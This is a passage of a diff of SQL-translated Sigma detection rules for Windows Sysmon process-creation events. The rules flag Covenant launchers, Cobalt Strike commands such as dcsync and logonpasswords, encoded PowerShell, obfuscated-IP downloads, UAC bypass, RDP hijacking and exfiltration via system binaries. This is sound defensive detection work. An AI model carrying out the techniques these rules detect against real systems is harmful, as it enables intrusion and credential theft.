(CVE-2022-30190) vulnerability", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1055" + "attack.t1218", + "attack.execution" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%dllhost.exe' ESCAPE '\\' AND Image LIKE '%\\\\dllhost.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\pcwrun.exe' ESCAPE '\\' AND CommandLine LIKE '%../%' ESCAPE '\\')" ], - "filename": "proc_creation_win_dllhost_no_cli_execution.yml" + "filename": "proc_creation_win_lolbin_pcwrun_follina.yml" }, { - "title": "Suspicious Rundll32 Invoking Inline VBScript", - "id": "1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd", + "title": "HackTool - Covenant PowerShell Launcher", + "id": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", "status": "test", - "description": "Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious command lines used in Covenant luanchers", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1055" - ], - "falsepositives": [ - "Unknown" + "attack.t1059.001", + "attack.t1564.003" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%Execute%' ESCAPE '\\' AND CommandLine LIKE '%RegRead%' ESCAPE '\\' AND CommandLine LIKE '%window.close%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%-Sta%' ESCAPE '\\' AND CommandLine LIKE '%-Nop%' ESCAPE '\\' AND CommandLine LIKE '%-Window%' ESCAPE '\\' AND CommandLine LIKE '%Hidden%' ESCAPE '\\' AND (CommandLine LIKE '%-Command%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\')) OR (CommandLine LIKE '%sv o (New-Object IO.MemorySteam);sv d %' ESCAPE '\\' OR CommandLine LIKE '%mshta file.hta%' ESCAPE '\\' OR CommandLine LIKE '%GruntHTTP%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand cwB2ACAAbwAgA%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_inline_vbs.yml" + "filename": "proc_creation_win_hktl_covenant.yml" }, { - "title": "Conhost.exe CommandLine Path Traversal", - "id": "ee5e119b-1f75-4b34-add8-3be976961e39", - "status": "experimental", - "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Splwow64 Without Params", + "id": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", + "status": "test", + "description": "Detects suspicious Splwow64.exe process without any command line parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.003" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentCommandLine LIKE '%conhost%' ESCAPE '\\' AND CommandLine LIKE '%/../../%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\splwow64.exe' ESCAPE '\\' AND CommandLine LIKE '%splwow64.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_conhost_path_traversal.yml" + "filename": "proc_creation_win_splwow64_cli_anomaly.yml" }, { - "title": "Regedit as Trusted Installer", - "id": "883835a7-df45-43e4-bf1d-4268768afda4", - "status": "test", - "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Shells Spawned by Java", + "id": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", + "status": "experimental", + "description": "Detects suspicious shell spawned from Java host process (e.g. log4j exploitation)", + "author": "Andreas Hunkeler (@Karneades), Florian Roth", "tags": [ - "attack.privilege_escalation", - "attack.t1548" + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Unlikely" + "Legitimate calls to system binaries", + "Company specific internal usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regedit.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\TrustedInstaller.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regedit_trustedinstaller.yml" + "filename": "proc_creation_win_java_susp_child_process.yml" }, { - "title": "LOLBAS Data Exfiltration by DataSvcUtil.exe", - "id": "e290b10b-1023-4452-a4a9-eb31a9013b3a", + "title": "Arbitrary Binary Execution Using GUP Utility", + "id": "d65aee4d-2292-4cea-b832-83accd6cfa43", "status": "experimental", - "description": "Detects when a user performs data exfiltration by using DataSvcUtil.exe", - "author": "Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger", + "description": "Detects execution of the Notepad++ updater (gup) to launch other commands or executables", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567" + "attack.execution" ], "falsepositives": [ - "DataSvcUtil.exe being used may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + "Other parent binaries using GUP not currently identified" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%/in:%' ESCAPE '\\' OR CommandLine LIKE '%/out:%' ESCAPE '\\' OR CommandLine LIKE '%/uri:%' ESCAPE '\\') AND (Image LIKE '%\\\\DataSvcUtil.exe' ESCAPE '\\' OR OriginalFileName = 'DataSvcUtil.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\gup.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Notepad++\\\\notepad++.exe%' ESCAPE '\\') OR (ParentImage LIKE '%\\\\Notepad++\\\\updater\\\\%' ESCAPE '\\') OR (CommandLine = '')))" ], - "filename": "proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" + "filename": "proc_creation_win_gup_arbitrary_binary_execution.yml" }, { - "title": "Operator Bloopers Cobalt Strike Commands", - "id": "647c7b9e-d784-4fda-b9a0-45c565a7b729", - "status": "experimental", - "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", - "author": "_pete_0, TheDFIRReport", + "title": "Suspicious CodePage Switch Via CHCP", + "id": "c7942406-33dd-4377-a564-0f62db0593a3", + "status": "test", + "description": "Detects a code page switch in command line or batch scripts to a rare language", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.003" + "attack.t1036", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Administrative activity (adjust code pages according to your organization's region)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ((CommandLine LIKE 'cmd %' ESCAPE '\\' OR CommandLine LIKE 'cmd.exe%' ESCAPE '\\' OR CommandLine LIKE 'c:\\\\windows\\\\system32\\\\cmd.exe%' ESCAPE '\\') AND (CommandLine LIKE '%psinject%' ESCAPE '\\' OR CommandLine LIKE '%spawnas%' ESCAPE '\\' OR CommandLine LIKE '%make\\_token%' ESCAPE '\\' OR CommandLine LIKE '%remote-exec%' ESCAPE '\\' OR CommandLine LIKE '%rev2self%' ESCAPE '\\' OR CommandLine LIKE '%dcsync%' ESCAPE '\\' OR CommandLine LIKE '%logonpasswords%' ESCAPE '\\' OR CommandLine LIKE '%execute-assembly%' ESCAPE '\\' OR CommandLine LIKE '%getsystem%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '% 936' ESCAPE '\\' OR CommandLine LIKE '% 1258' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" + "filename": "proc_creation_win_chcp_codepage_switch.yml" }, { - "title": "Raccine Uninstall", - "id": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", + "title": "MpiExec Lolbin", + "id": "729ce0ea-5d8f-4769-9762-e35de441586d", "status": "test", - "description": "Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.", + "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218" ], "falsepositives": [ - "Legitimate deinstallation by administrative staff" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%taskkill %' ESCAPE '\\' AND CommandLine LIKE '%RaccineSettings.exe%' ESCAPE '\\') OR (CommandLine LIKE '%reg.exe%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Tray%' ESCAPE '\\') OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%/DELETE%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Rules Updater%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mpiexec.exe' ESCAPE '\\' OR Imphash = 'd8b52ef6aaa3a81501bdfff9dbb96217' OR Hashes LIKE '%IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217%' ESCAPE '\\') AND (CommandLine LIKE '% /n 1 %' ESCAPE '\\' OR CommandLine LIKE '% -n 1 %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_disable_raccine.yml" + "filename": "proc_creation_win_lolbin_mpiexec.yml" }, { - "title": "WmiPrvSE Spawned A Process", - "id": "d21374ff-f574-44a7-9998-4a8c8bf33d7d", - "status": "stable", - "description": "Detects wmiprvse spawning processes", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Active Directory Database Snapshot Via ADExplorer", + "id": "9212f354-7775-4e28-9c9f-8f0a4544e664", + "status": "experimental", + "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047" + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\WmiPrvSe.exe' ESCAPE '\\' AND NOT ((LogonId IN ('0x3e7', 'null') OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') OR (Image LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR Image LIKE '%\\\\WerFault.exe' ESCAPE '\\')) OR (LogonId = '')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmiprvse_spawning_process.yml" + "filename": "proc_creation_win_sysinternals_adexplorer_execution.yml" }, { - "title": "Potential Suspicious Child Process Of 3CXDesktopApp", - "id": "63f3605b-979f-48c2-b7cc-7f90523fed88", + "title": "Suspicious Execution of Powershell with Base64", + "id": "fb843269-508c-4b76-8b8d-88679db22ce7", "status": "experimental", - "description": "Detects potential suspicious child processes of \"3CXDesktopApp.exe\". Which could be related to the 3CXDesktopApp supply chain compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Commandline to launch powershell with a base64 payload", + "author": "frack113", "tags": [ - "attack.command_and_control", "attack.execution", - "attack.t1218" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% -Encoding %' ESCAPE '\\') OR ((ParentImage LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_malware_3cx_compromise_susp_children.yml" + "filename": "proc_creation_win_powershell_encode.yml" }, { - "title": "Modify Group Policy Settings", - "id": "ada4b0c4-758b-46ac-9033-9004613a150d", + "title": "Sysinternals PsSuspend Execution", + "id": "48bbc537-b652-4b4e-bd1d-281172df448f", "status": "experimental", - "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", - "author": "frack113", + "description": "Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1484.001" + "attack.discovery", + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System%' ESCAPE '\\' AND (CommandLine LIKE '%GroupPolicyRefreshTimeDC%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTimeOffsetDC%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTime%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTimeOffset%' ESCAPE '\\' OR CommandLine LIKE '%EnableSmartScreen%' ESCAPE '\\' OR CommandLine LIKE '%ShellSmartScreenLevel%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'pssuspend.exe' OR (Image LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR Image LIKE '%\\\\pssuspend64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_modify_group_policy_settings.yml" + "filename": "proc_creation_win_sysinternals_pssuspend_execution.yml" }, { - "title": "Run PowerShell Script from Redirected Input Stream", - "id": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", - "status": "test", - "description": "Detects PowerShell script execution via input stream redirect", - "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", + "title": "Potential Tampering With RDP Related Registry Keys Via Reg.EXE", + "id": "0d5675be-bc88-4172-86d3-1e96a4476536", + "status": "experimental", + "description": "Detects the execution of \"reg.exe\" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values", + "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1059" + "attack.lateral_movement", + "attack.t1021.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '\\s-\\s*<')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\Terminal Server%' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD%' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')) AND ((CommandLine LIKE '%Licensing Core%' ESCAPE '\\' AND CommandLine LIKE '%EnableConcurrentSessions%' ESCAPE '\\') OR (CommandLine LIKE '%WinStations\\\\RDP-Tcp%' ESCAPE '\\' OR CommandLine LIKE '%MaxInstanceCount%' ESCAPE '\\' OR CommandLine LIKE '%fEnableWinStation%' ESCAPE '\\' OR CommandLine LIKE '%TSUserEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSAppCompat%' ESCAPE '\\' OR CommandLine LIKE '%IdleWinStationPoolCount%' ESCAPE '\\' OR CommandLine LIKE '%TSAdvertise%' ESCAPE '\\' OR CommandLine LIKE '%AllowTSConnections%' ESCAPE '\\' OR CommandLine LIKE '%fSingleSessionPerUser%' ESCAPE '\\' OR CommandLine LIKE '%fDenyTSConnections%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_run_script_from_input_stream.yml" + "filename": "proc_creation_win_reg_rdp_keys_tamper.yml" }, { - "title": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl", - "id": "074e0ded-6ced-4ebd-8b4d-53f55908119d", + "title": "Regsvr32 Flags Anomaly", + "id": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", "status": "test", - "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", - "author": "Julia Fomina, oscd.community", + "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1218.010" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%winrm%' ESCAPE '\\' AND (CommandLine LIKE '%format:pretty%' ESCAPE '\\' OR CommandLine LIKE '%format:\"pretty\"%' ESCAPE '\\' OR CommandLine LIKE '%format:\"text\"%' ESCAPE '\\' OR CommandLine LIKE '%format:text%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '% /i:%' ESCAPE '\\') AND NOT (CommandLine LIKE '% /n %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_winrm_awl_bypass.yml" + "filename": "proc_creation_win_regsvr32_flags_anomaly.yml" }, { - "title": "Execute From Alternate Data Streams", - "id": "7f43c430-5001-4f8b-aaa9-c3b88f18fa5c", - "status": "test", - "description": "Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection", + "title": "Change PowerShell Policies to an Insecure Level", + "id": "87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180", + "status": "experimental", + "description": "Detects use of executionpolicy option to set insecure policies", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Administrator script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%txt:%' ESCAPE '\\' AND ((CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\') OR (CommandLine LIKE '%makecab %' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\') OR (CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '% export %' ESCAPE '\\') OR (CommandLine LIKE '%regedit %' ESCAPE '\\' AND CommandLine LIKE '% /E %' ESCAPE '\\') OR (CommandLine LIKE '%esentutl %' ESCAPE '\\' AND CommandLine LIKE '% /y %' ESCAPE '\\' AND CommandLine LIKE '% /d %' ESCAPE '\\' AND CommandLine LIKE '% /o %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% -executionpolicy %' ESCAPE '\\' OR CommandLine LIKE '% -ep %' ESCAPE '\\' OR CommandLine LIKE '% -exec %' ESCAPE '\\') AND (CommandLine LIKE '%Unrestricted%' ESCAPE '\\' OR CommandLine LIKE '%bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Program Files%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Code\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_alternate_data_streams.yml" + "filename": "proc_creation_win_powershell_set_policies_to_unsecure_level.yml" }, { - "title": "Suspicious Csi.exe Usage", - "id": "40b95d31-1afc-469e-8d34-9a3a667d058e", - "status": "experimental", - "description": "Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'", - "author": "Konstantin Grishchenko, oscd.community", + "title": "DLL Execution Via Register-cimprovider.exe", + "id": "a2910908-e86f-4687-aeba-76a5f996e652", + "status": "test", + "description": "Detects using register-cimprovider.exe to execute arbitrary dll file.", + "author": "Ivan Dyachkov, Yulia Fomina, oscd.community", "tags": [ - "attack.execution", - "attack.t1072", "attack.defense_evasion", - "attack.t1218" + "attack.t1574" ], "falsepositives": [ - "Legitimate usage by software developers" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\csi.exe' ESCAPE '\\' OR Image LIKE '%\\\\rcsi.exe' ESCAPE '\\') OR OriginalFileName IN ('csi.exe', 'rcsi.exe')) AND Company = 'Microsoft Corporation')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\register-cimprovider.exe' ESCAPE '\\' AND CommandLine LIKE '%-path%' ESCAPE '\\' AND CommandLine LIKE '%dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_csi_execution.yml" + "filename": "proc_creation_win_registry_cimprovider_dll_load.yml" }, { - "title": "Potential RDP Session Hijacking Activity", - "id": "224f140f-3553-4cd1-af78-13d81bf9f7cc", + "title": "Obfuscated IP Download", + "id": "cb5a2333-56cf-4562-8fcb-22ba1bca728d", "status": "experimental", - "description": "Detects potential RDP Session Hijacking activity on Windows systems", - "author": "@juju4", + "description": "Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.discovery" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\tscon.exe' ESCAPE '\\' OR OriginalFileName = 'tscon.exe') AND IntegrityLevel = 'SYSTEM')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\') AND ((CommandLine LIKE '%//0x%' ESCAPE '\\' OR CommandLine LIKE '%.0x%' ESCAPE '\\' OR CommandLine LIKE '%.00x%' ESCAPE '\\') OR (CommandLine LIKE '%http://\\%%' ESCAPE '\\' AND CommandLine LIKE '%\\%2e%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_tscon_rdp_session_hijacking.yml" + "filename": "proc_creation_win_susp_obfuscated_ip_download.yml" }, { - "title": "UAC Bypass Using Disk Cleanup", - "id": "b697e69c-746f-4a86-9f59-7bfff8eab881", - "status": "test", - "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Regsvr32 Spawning Explorer", + "id": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", + "status": "experimental", + "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", + "author": "elhoim", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\"\\\\system32\\\\cleanmgr.exe /autoclean /d C:' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_cleanmgr.yml" + 